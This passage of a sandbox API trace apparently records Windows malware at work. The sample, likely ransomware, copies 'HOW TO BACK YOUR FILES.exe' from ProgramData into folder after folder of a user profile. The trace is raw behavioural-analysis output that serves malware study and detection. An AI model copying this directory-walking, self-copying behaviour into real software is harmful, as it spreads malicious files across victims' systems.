lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.703] GetLastError () returned 0x0 [0078.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.703] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.703] CloseHandle (hObject=0xa4) returned 1 [0078.703] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.703] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.703] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.703] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.704] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.704] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.704] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.704] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.704] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.704] GetLastError () returned 0x0 [0078.704] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.704] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.705] CloseHandle (hObject=0xa4) returned 1 [0078.705] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.705] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.705] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.705] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.705] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.705] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.705] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.705] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.706] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.706] GetLastError () returned 0x0 [0078.706] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.706] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.706] CloseHandle (hObject=0xa4) returned 1 [0078.706] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.706] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.706] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.706] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.707] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.707] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.707] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.707] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.707] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.707] GetLastError () returned 0x0 [0078.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.708] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.708] CloseHandle (hObject=0xa4) returned 1 [0078.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.708] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.708] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.708] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.708] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.708] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.708] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.708] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.709] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.709] GetLastError () returned 0x0 [0078.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.709] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.709] CloseHandle (hObject=0xa4) returned 1 [0078.709] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.709] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.709] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.709] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.710] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" [0078.710] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft" [0078.710] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.710] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.710] GetLastError () returned 0x0 [0078.711] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.711] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.711] CloseHandle (hObject=0xa4) returned 1 [0078.711] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.711] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.711] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.711] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.711] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.711] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.711] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.711] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.713] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.713] GetLastError () returned 0x0 [0078.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.713] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.713] CloseHandle (hObject=0xa4) returned 1 [0078.714] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.714] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.714] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.714] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.714] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.714] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.714] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.714] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.715] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.715] GetLastError () returned 0x0 [0078.715] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.715] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.715] CloseHandle (hObject=0xa4) returned 1 [0078.715] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.715] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.715] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.715] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.715] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.716] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.716] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.716] GetLastError () returned 0x0 [0078.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.716] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.716] CloseHandle (hObject=0xa4) returned 1 [0078.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.717] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.717] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0078.717] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application 